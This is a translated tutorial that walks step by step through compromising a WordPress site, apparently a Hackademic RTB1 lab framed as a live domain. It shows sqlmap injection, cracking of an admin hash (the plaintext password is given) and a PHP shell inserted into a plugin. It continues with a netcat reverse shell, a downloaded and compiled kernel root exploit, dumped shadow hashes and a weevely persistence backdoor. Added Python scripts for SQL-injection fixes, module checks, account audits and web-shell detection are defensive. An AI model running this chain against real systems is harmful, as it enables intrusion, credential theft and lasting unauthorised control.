A Detailed WordPress Penetration Tutorial

A Detailed Penetration Tutorial
Author: Mohamed Ramadan & fsd010
Personal blog: www.hackfsd.com

This time our target website is hack-test.com. Ping the site to get the server's IP: we get 173.236.138.113, the IP address of the target web server. Next, let's find the other websites hosted on the same server, using sameip.org (in case we need to go in through a neighbouring site later).

On this IP we can see 26 websites running on the server 173.236.138.113:

 1. hijackthisforum.com
 2. sportforum.net
 3. freeonlinesudoku.net
 4. cosplayhell.com
 5. videogamenews.org
 6. gametour.com
 7. qualitypetsitting.net
 8. brendanichols.com
 9. 8ez.com
10. hack-test.com
11. kisax.com
12. paisans.com
13. mghz.com
14. debateful.com
15. jazzygoodtimes.com
16. fruny.com
17. vbum.com
18. wuckie.com
19. force5inc.com
20. virushero.com
21. twincitiesbusinesspeernetwork.com
22. jennieko.com
23. davereedy.com
24. joygarrido.com
25. prismapp.com
26. utiligolf.com

26 websites run on this server [173.236.138.113]. Many hackers break into a site by way of another site on the same server, but this time we go straight at the target site. We want more information about the website, such as:

1. DNS records (A, NS, TXT, MX and SOA)
2. Web server type (Apache, IIS, Tomcat)
3. Registration details (the company's or your own domain registration record)
4. Your name, address, email and telephone number
5. The scripting language the site runs (php, asp, asp.net, jsp, cfm)
6. Server operating system (Unix, Linux, Windows, Solaris)
7. Open ports on the server (80, 443, 21, etc.)

Next, let's find the site's DNS records. We look them up on "Who.is". OK, here are the site's DNS records:
HACK-TEST.COM DNS records

    Record             Type  TTL      Priority  Content
    hack-test.com      A     4 hours            173.236.138.113
    hack-test.com      SOA   4 hours            ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
    hack-test.com      NS    4 hours            ns1.dreamhost.com
    hack-test.com      NS    4 hours            ns3.dreamhost.com
    hack-test.com      NS    4 hours            ns2.dreamhost.com
    www.hack-test.com  A     4 hours            173.236.138.113

Good! Now let's identify the web server. And there it is: the server reports itself as Apache. Next we determine the version. Information on HACK-TEST.COM:

    IP: 173.236.138.113
    Site status: Active
    Server type: Apache
    Traffic rank: 1 month: 3,213,968; 3 months: 2,161,753
    Page views: 1 month: 2.0; 3 months: 3.7

Now let's find the domain owner's registration information:
Now we have the domain owner's registration details. Next, let's find the scripting language the site runs, the server's operating system and the service version. We use a very handy tool from BackTrack 5 R1, whatweb. We find that the site is a WordPress blog written in PHP, the operating system is Fedora Linux and the web server is Apache 2.2.15. Next, we look for the server's open ports. Bring out nmap.

1 – Discover the services running on the server:

    root@bt:/# nmap -sV hack-test.com

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
    Nmap scan report for hack-test.com (192.168.1.2)
    Host is up (0.0013s latency).
    Not shown: 998 filtered ports
    PORT   STATE  SERVICE VERSION
    22/tcp closed ssh
    80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
    MAC Address: 00:0C:29:01:8A:4D (VMware)

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2 – The server's operating system:

    root@bt:/# nmap -O hack-test.com

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
    Nmap scan report for hack-test.com (192.168.1.2)
    Host is up (0.00079s latency).
    Not shown: 998 filtered ports
    PORT   STATE  SERVICE
    22/tcp closed ssh
    80/tcp open   http
    MAC Address: 00:0C:29:01:8A:4D (VMware)
    Device type: general purpose
    Running: Linux 2.6.X
    OS details: Linux 2.6.22 (Fedora Core 6)
    Network Distance: 1 hop

    OS detection performed. Please report any incorrect results at http://nmap.org/submit/
    Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

The operating system is Linux 2.6.22 (Fedora Core 6) and the only open port is 80. Now we want to find the site's sensitive information by scanning for vulnerabilities: SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF and so on. We use Nikto.pl to gather information and perhaps turn up some vulnerabilities:

    root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
    - Nikto v2.1.4
    ---------------------------------------------------------------------------
    + Target IP:          192.168.1.2
    + Target Hostname:    hack-test.com
    + Target Port:        80
    + Start Time:         2011-12-29 06:50:03
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.15 (Fedora)
    + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
    + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-3268: /icons/: Directory indexing found.
    + OSVDB-3233: /icons/README: Apache default file found.
    + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
    + End Time:           2011-12-29 06:50:37 (34 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

We also test with W3AF from BackTrack 5 R1:

    root@bt:/pentest/web/w3af# ./w3af_gui
    Starting w3af, running on:
    2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
    [GCC 4.4.3]
    GTK version: 2.20.1
    PyGTK version: 2.17.0

    w3af - Web Application Attack and Audit Framework
    Version: 1.2
    Revision: 4605
    Author: Andres Riancho and the w3af team.

Enter the target URL and tick the "audit" option:
When the scan finishes we can see that the site has SQL injection, XSS and other vulnerabilities. Let's look at the SQL injection first. The injection point is:

    http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

Let's test it. Manual exploitation fails, so we try sqlmap to exploit the injection and dump the database contents. Run sqlmap with -u and the URL; prompts appear almost at once, answer n and press Enter to continue. You can see that the site is vulnerable to error-based injection and that the back-end database is version 5. Add the --dbs parameter to list all the databases.

Now we can see 3 databases. Add -D with the database name and --tables to dump the WordPress tables; this shows all of them. We want the user information and passwords in "wp_users" so that we can take over the admin panel. Add -T to dump the columns of the wp_users table: 22 columns are found.

We want the administrator's information (account and password) from these columns, so add -C to dump the user data. What we are after is the site's sensitive data: the administrator's username and password. Now the administrator is laid bare before us. A pity: the password is hashed! OK, we take the hash to "http://www.onlinehashcrack.com/free-hash-reverse.php" to crack it.
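The injection point above exists because the cat request parameter is pasted straight into a SQL statement. As an added example that is not part of the original tutorial, the following Python script (SQLite in memory, constructed sample rows, hypothetical function names) puts that vulnerable pattern next to the fix: the probe value from the URL, which URL-decodes to d'z"0, makes the concatenated query fail with a database error, which is exactly the signal that error-based injection relies on, while the parameterised query with type validation rejects it quietly and returns nothing.

```python
import sqlite3

# Constructed sample rows standing in for a WordPress category table.
SAMPLE_ROWS = [(1, "news"), (2, "tutorials"), (3, "tools")]

# The probe from the tutorial's URL, ?cat=d%27z%220, after URL decoding.
PROBE = "d'z\"0"


def make_db():
    """In-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, cat):
    """The pattern sqlmap exploited: the raw parameter is pasted into SQL.

    A quote inside `cat` changes the statement. An application that prints
    the resulting database error onto the page hands out the oracle that
    error-based injection needs; here the message is returned so that the
    failure is visible to the caller.
    """
    sql = "SELECT name FROM categories WHERE id = '%s'" % cat
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return "db error: %s" % exc


def lookup_fixed(conn, cat):
    """Hardened version: enforce the parameter's type, then bind it.

    A bound parameter travels as data and is never parsed as SQL, so no
    input can alter the statement; the int() check additionally rejects
    anything that is not a category id before the database is touched.
    """
    try:
        cat_id = int(cat)
    except (TypeError, ValueError):
        return []
    return [row[0] for row in conn.execute(
        "SELECT name FROM categories WHERE id = ?", (cat_id,))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:", lookup_vulnerable(db, "2"))
    print("vulnerable, probe input: ", lookup_vulnerable(db, PROBE))
    print("fixed, normal input:     ", lookup_fixed(db, "2"))
    print("fixed, probe input:      ", lookup_fixed(db, PROBE))
```

The same split applies to the PHP the site actually runs: prepared statements (or, in WordPress, $wpdb->prepare()) for the query, and an error handler that logs the database message instead of echoing it, so that a failed probe tells the sender nothing.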
We can clearly see that the password is q1w2e3q1w2e3 and the username is "GeorgeMiller". The WordPress admin path is "wp-admin". We are in! Now we plant our shell: we upload a PHP shell, which lets us run some Linux commands on the web server. We edit a plugin called "Textile".

Click Edit. We insert the PHP shell code into the plugin, update the file, then open the shell in the browser.

The shell is running. We now have the website, but our goal is root on the server, and with it full control of every site hosted on it. We use the shell's "back-connect" feature to connect back to our address "192.168.1.6" on port "5555". Before connecting, we listen on port 5555 with nc (netcat).
Now let's connect and see whether we can run some Linux commands:

    id
    uid=48(apache) gid=489(apache) groups=489(apache)
    pwd
    /var/www/html/Hackademic_RTB1/wp-content/plugins
    uname -a
    Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

The id command shows the user and its groups; pwd shows the current directory on the server; uname -a shows the system information, including the kernel version. So we know the server's kernel is 2.6.31.5-127.fc12.i686. Let's look on exploit-db.com for vulnerabilities in "kernel 2.6.31":

    Date        Description                                                             Plat.  Author
    2009-10-15  Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service            linux  Simon Vallet
    2009-08-31  Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte Stack Disclosure Exploit      linux  Jon Oberheide
    2009-08-25  Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure   linux  Jon Oberheide
    2009-08-04  Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit  linux  Jon Oberheide

I then tried every exploit in this list and not one of them worked; bad luck! So I brought out the big knife (a newer exploit):

    Date        Description                                     Plat.  Author
    2010-10-19  Linux RDS Protocol Local Privilege Escalation   linux  Dan Rosenberg
    http://www.exploit-db.com/exploits/15285

I opened that page and copied the download link http://www.exploit-db.com/download/15285, then ran this command in the netcat reverse shell:

    wget http://www.exploit-db.com/download/15285 -O roro.c
    --2011-12-28 00:48:01--  http://www.exploit-db.com/download/15285
    Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
    Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
    HTTP request sent, awaiting response... 301 Moved Permanently
    Location: http://www.exploit-db.com/download/15285/ [following]
    --2011-12-28 00:48:02--  http://www.exploit-db.com/download/15285/
    Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 7154 (7.0K) [application/txt]
    Saving to: `roro.c'

     0K ..

We use wget to fetch the exploit from exploit-db.com and -O to save it as roro.c. Note: most of the Linux kernel is written in C, so the exploit is saved with a .c extension. Now let's look at the exploit's source code (the listing in the document breaks off after the first function's opening lines):

    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/ptrace.h>
    #include <sys/utsname.h>

    #define RECVPORT 5555
    #define SENDPORT 6666

    int prep_sock(int port)
    {
        int s, ret;
        struct sockaddr_in addr;

        s = socket(PF_RDS, SOCK_SEQPACKET, 0);

        if(s < 0) {
            printf("[*] Could not open socket.\n");
            exit(-1);
        }

        memset(&addr, 0, sizeof(addr));

The code is all C. After saving it, we compile it into an ELF binary:

    gcc roro.c -o roro
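As an added example that is not part of the tutorial, here is the check a defender would run on a host like this one: parse the uname -r release string, compare it with the floor printed in the exploit's own banner (>= 2.6.30), and report whether the rds kernel module is loaded or blocked. The exploit's first step in the source above is socket(PF_RDS, SOCK_SEQPACKET, 0); when rds is built as a module, that call makes the kernel load it on demand, so an install rds /bin/true line in /etc/modprobe.d is the usual way to refuse it on hosts that do not use RDS. The /proc/modules and modprobe.d texts and the function names are constructed for the example.

```python
import re

# Floor from the exploit's banner: "Linux kernel >= 2.6.30 RDS socket exploit".
EXPLOIT_FLOOR = (2, 6, 30)

# Constructed /proc/modules excerpts (name size refcount deps state address).
PROC_MODULES_WITH_RDS = """\
rds 98304 0 - Live 0xe09d0000
ipv6 262144 12 - Live 0xe0a10000
"""
PROC_MODULES_NO_RDS = """\
ipv6 262144 12 - Live 0xe0a10000
"""

# Constructed /etc/modprobe.d fragment that refuses to load rds.
MODPROBE_BLOCK = """\
# refuse the RDS protocol module; nothing on this host uses it
install rds /bin/true
"""


def parse_kernel_release(release):
    """'2.6.31.5-127.fc12.i686' -> (2, 6, 31, 5); the distro suffix is ignored."""
    numeric = release.split("-", 1)[0]
    return tuple(int(part) for part in numeric.split(".") if part.isdigit())


def kernel_at_least(version, floor):
    """Tuple comparison: (2, 6, 31, 5) >= (2, 6, 30) is True."""
    return tuple(version) >= tuple(floor)


def rds_status(proc_modules, modprobe_conf):
    """'loaded', 'blocked' (install rule present) or 'autoloadable'.

    The last state is the dangerous one on a host that does not use RDS:
    the first socket(PF_RDS, ...) call from any local user makes the kernel
    load the module on demand.
    """
    for line in proc_modules.splitlines():
        fields = line.split()
        if fields and fields[0] == "rds":
            return "loaded"
    if re.search(r"^\s*install\s+rds\s+/bin/(?:true|false)\s*$", modprobe_conf, re.M):
        return "blocked"
    return "autoloadable"


def assess(release, proc_modules, modprobe_conf):
    """Findings for one host; an empty list means nothing to act on."""
    findings = []
    version = parse_kernel_release(release)
    status = rds_status(proc_modules, modprobe_conf)
    if kernel_at_least(version, EXPLOIT_FLOOR):
        findings.append(
            "kernel %s is within the exploit's stated range (>= 2.6.30); "
            "confirm the distribution's fix is installed" % release)
        if status != "blocked":
            findings.append(
                "rds module is %s; block it with 'install rds /bin/true' in "
                "/etc/modprobe.d (and unload it if loaded) unless RDS is required"
                % status)
    return findings


if __name__ == "__main__":
    for finding in assess("2.6.31.5-127.fc12.i686", PROC_MODULES_NO_RDS, ""):
        print("-", finding)
```

A version comparison cannot tell a patched kernel from an unpatched one (distributions backport fixes without changing the upstream version), which is why the first finding asks for the fix to be confirmed rather than declaring the host vulnerable; the module check, by contrast, is decisive, because the exploit cannot get past its first socket() call without the module.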
Run the exploit:

    ./roro
    [*] Linux kernel >= 2.6.30 RDS socket exploit
    [*] by Dan Rosenberg
    [*] Resolving kernel addresses...
    [+] Resolved rds_proto_ops to 0xe09f0b20
    [+] Resolved rds_ioctl to 0xe09db06a
    [+] Resolved commit_creds to 0xc044e5f1
    [+] Resolved prepare_kernel_cred to 0xc044e452
    [*] Overwriting function pointer...
    [*] Triggering payload...
    [*] Restoring function pointer...

Then we type the id command and see that we now have root:

    id
    uid=0(root) gid=0(root)

We can read the /etc/shadow file:

    cat /etc/shadow
    root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
    bin:*:14495:0:99999:7:::
    daemon:*:14495:0:99999:7:::
    adm:*:14495:0:99999:7:::
    lp:*:14495:0:99999:7:::
    sync:*:14495:0:99999:7:::
    shutdown:*:14495:0:99999:7:::
    halt:*:14495:0:99999:7:::
    mail:*:14495:0:99999:7:::
    uucp:*:14495:0:99999:7:::
    operator:*:14495:0:99999:7:::
    games:*:14495:0:99999:7:::
    gopher:*:14495:0:99999:7:::
    ftp:*:14495:0:99999:7:::
    nobody:*:14495:0:99999:7:::
    vcsa:!!:14557::::::
    avahi-autoipd:!!:14557::::::
    ntp:!!:14557::::::
    dbus:!!:14557::::::
    rtkit:!!:14557::::::
    nscd:!!:14557::::::
    tcpdump:!!:14557::::::
    avahi:!!:14557::::::
    haldaemon:!!:14557::::::
    openvpn:!!:14557::::::
    apache:!!:14557::::::
    saslauth:!!:14557::::::
    mailnull:!!:14557::::::
    smmsp:!!:14557::::::
    smolt:!!:14557::::::
    sshd:!!:14557::::::
    pulse:!!:14557::::::
    gdm:!!:14557::::::
    p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
    mysql:!!:14981::::::

And the /etc/passwd file:

    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
    avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
    nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
    tcpdump:x:72:72::/:/sbin/nologin
    avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
    haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
    openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
    apache:x:48:489:Apache:/var/www:/sbin/nologin
    saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
    mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
    smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
    sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
    gdm:x:42:481::/var/lib/gdm:/sbin/nologin
    p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
    mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash

We could use "john the ripper" to crack every user's password here, but we won't, because our aim is to keep hold of this box for the long term. Instead we upload a weevely backdoor. Let's get to work!

1 – How weevely is used:

    root@bt:/pentest/backdoors/web/weevely# ./main.py
    Weevely 0.3 - Generate and manage stealth PHP backdoors.
    Copyright (c) 2011-2012 Weevely Developers
    Website: http://code.google.com/p/weevely/

    Usage: main.py [options]

    Options:
      -h, --help            show this help message and exit
      -g, --generate        Generate backdoor crypted code, requires -o and -p .
      -o OUTPUT, --output=OUTPUT
                            Output filename for generated backdoor .
      -c COMMAND, --command=COMMAND
                            Execute a single command and exit, requires -u and -p
      -t, --terminal        Start a terminal-like session, requires -u and -p .
      -C CLUSTER, --cluster=CLUSTER
                            Start in cluster mode reading items from the give file,
                            in the form label,url,password where label is optional.
      -p PASSWORD, --password=PASSWORD
                            Password of the encrypted backdoor .
      -u URL, --url=URL     Remote backdoor URL .

2 – Use weevely to generate a backdoor file hax.php with the password koko:

    root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
    Weevely 0.3 - Generate and manage stealth PHP backdoors.
    Copyright (c) 2011-2012 Weevely Developers
    Website: http://code.google.com/p/weevely/
    + Backdoor file hax.php created with password koko.

After uploading it we connect:

    root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
    Weevely 0.3 - Generate and manage stealth PHP backdoors.
    Copyright (c) 2011-2012 Weevely Developers
    Website: http://code.google.com/p/weevely/
    + Using method system().
    + Retrieving terminal basic environment variables .
    [apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]

Our hax.php backdoor works.

Conclusion: in this article we learned some hacking techniques. I hope you use them for learning and not for destruction, and I hope you enjoyed the article. Thank you! In the next article we will learn how to protect our websites and servers against these attacks and make them more secure.
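The /etc/passwd and /etc/shadow dumps shown above are also exactly what a defender should be reading on a host like this. As an added example that is not part of the tutorial, this Python script parses listings in that format and reports the conditions worth acting on: more than one UID 0 entry, service accounts that have an interactive shell (the dump shows mysql with /bin/bash), and which interactive accounts have a usable password hash at all. The sample lines are constructed to mirror the shape of the dump; the hash fields are placeholders, and the function names are hypothetical.

```python
# Accounts that exist to run a service and should never have a login shell.
SERVICE_ACCOUNTS = {"mysql", "apache", "sshd", "ntp", "dbus", "ftp", "mail", "nobody"}
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/ksh"}

# Constructed sample mirroring the shape of the listing in the tutorial.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
"""

# Constructed shadow lines; the $6$ fields are placeholders, not real hashes.
SHADOW_SAMPLE = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
apache:!!:14557::::::
p0wnbox.Team:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:14981:0:99999:7:::
mysql:!!:14981::::::
"""


def parse_passwd(text):
    """Each line is name:x:uid:gid:gecos:home:shell (exactly seven fields)."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name, _pw, uid, gid, _gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "home": home, "shell": shell})
    return users


def parse_shadow(text):
    """Map account name -> password field (the second column)."""
    fields = {}
    for line in text.splitlines():
        if line.strip():
            name, pw = line.split(":")[:2]
            fields[name] = pw
    return fields


def password_usable(field):
    """True when the shadow field is something password login can use.

    '*' and '!!' mean no password was ever set; a leading '!' locks an
    otherwise valid hash. An empty field would allow login with no password
    at all, so it counts as usable too.
    """
    return not field.startswith(("!", "*"))


def audit(passwd_text, shadow_text):
    """Findings plus the list of interactive accounts that accept a password."""
    users = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    findings, password_logins, seen = [], [], set()
    uid0 = [u["name"] for u in users if u["uid"] == 0]
    if len(uid0) > 1:
        findings.append("multiple UID 0 entries: %s" % ", ".join(uid0))
    for u in users:
        if u["name"] in seen:
            findings.append("duplicate entry for %s" % u["name"])
            continue
        seen.add(u["name"])
        interactive = u["shell"] in INTERACTIVE_SHELLS
        if interactive and u["name"] in SERVICE_ACCOUNTS:
            findings.append("service account %s has interactive shell %s"
                            % (u["name"], u["shell"]))
        # Accounts missing from shadow are treated as locked ("!").
        if interactive and password_usable(shadow.get(u["name"], "!")):
            password_logins.append(u["name"])
    return {"findings": findings, "password_logins": password_logins}


if __name__ == "__main__":
    report = audit(PASSWD_SAMPLE, SHADOW_SAMPLE)
    for finding in report["findings"]:
        print("-", finding)
    print("password logins possible for:", ", ".join(report["password_logins"]))
```

The password_logins list is the set of accounts whose hashes a cracker would bother with; the shorter that list, and the fewer of them that are reachable over SSH, the less the leaked shadow file is worth. Compare the output against what the host is supposed to look like, not against an absolute rule, since a dedicated admin account with a shell is normal and a database account with one is not.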
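The two persistence steps in this tutorial, PHP inserted into the Textile plugin through the plugin editor and hax.php dropped into wp-content/plugins, both change files on disk, and that is what the follow-up the author promises would have to catch. As an added example that is not part of the tutorial or of weevely, this Python script builds a SHA-256 manifest of a plugins directory, reports files added, removed or modified since the baseline, and additionally flags PHP files containing literals typical of web shells. The plugin tree, the stand-in Textile file and the flagged strings are constructed for the example; nothing in it is a working backdoor.

```python
import hashlib
import os
import re
import tempfile

# Literals typical of PHP shells and of code planted through the plugin editor.
SUSPICIOUS = re.compile(
    r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen)\s*\(|base64_decode\s*\(")

# Constructed stand-in for the Textile plugin's main file (not the real plugin).
CLEAN_PLUGIN = (
    "<?php\n"
    "/* Plugin Name: Textile (constructed stand-in) */\n"
    "function textile_filter($text) { return $text; }\n"
)
# Constructed line representing the kind of code the plugin editor was used to
# insert. The argument is a placeholder: this is a detection target, not a shell.
INJECTED_LINE = "eval(base64_decode('PLACEHOLDER_NOT_A_PAYLOAD'));\n"
# Constructed dropper standing in for hax.php; the same remark applies.
DROPPER = "<?php @eval(base64_decode('PLACEHOLDER_NOT_A_PAYLOAD')); ?>\n"


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Relative path (forward slashes) -> SHA-256 for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def scan(root, baseline):
    """Compare the tree with a saved manifest and grep PHP files for shell literals."""
    current = build_manifest(root)
    report = {"added": [], "modified": [], "removed": [], "suspicious": []}
    for rel, digest in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
    report["removed"] = [rel for rel in baseline if rel not in current]
    for rel in current:
        if rel.endswith(".php"):
            with open(os.path.join(root, rel), "r", encoding="utf-8", errors="replace") as fh:
                if SUSPICIOUS.search(fh.read()):
                    report["suspicious"].append(rel)
    return {key: sorted(value) for key, value in report.items()}


def make_sample_tree():
    """Temporary plugins directory in its clean state (constructed)."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    os.makedirs(os.path.join(root, "textile"))
    with open(os.path.join(root, "textile", "textile.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_PLUGIN)
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n// Silence is golden.\n")
    return root


def tamper_sample_tree(root):
    """Reproduce the two on-disk effects of the persistence steps above."""
    with open(os.path.join(root, "textile", "textile.php"), "a", encoding="utf-8") as fh:
        fh.write(INJECTED_LINE)
    with open(os.path.join(root, "hax.php"), "w", encoding="utf-8") as fh:
        fh.write(DROPPER)


if __name__ == "__main__":
    plugins = make_sample_tree()
    baseline = build_manifest(plugins)   # taken while the site is known clean
    tamper_sample_tree(plugins)
    for key, paths in scan(plugins, baseline).items():
        print("%-11s %s" % (key + ":", ", ".join(paths) or "-"))
```

The manifest comparison is the primary signal: a backdoor like the one weevely generates is obfuscated and may contain none of the literals the regex looks for, but it cannot avoid being a new or changed file, so the baseline has to be taken while the site is known clean and stored somewhere the web server user cannot write. The editor step itself can be removed as an option by setting DISALLOW_FILE_EDIT to true in wp-config.php, which disables the plugin and theme editors in the WordPress admin panel.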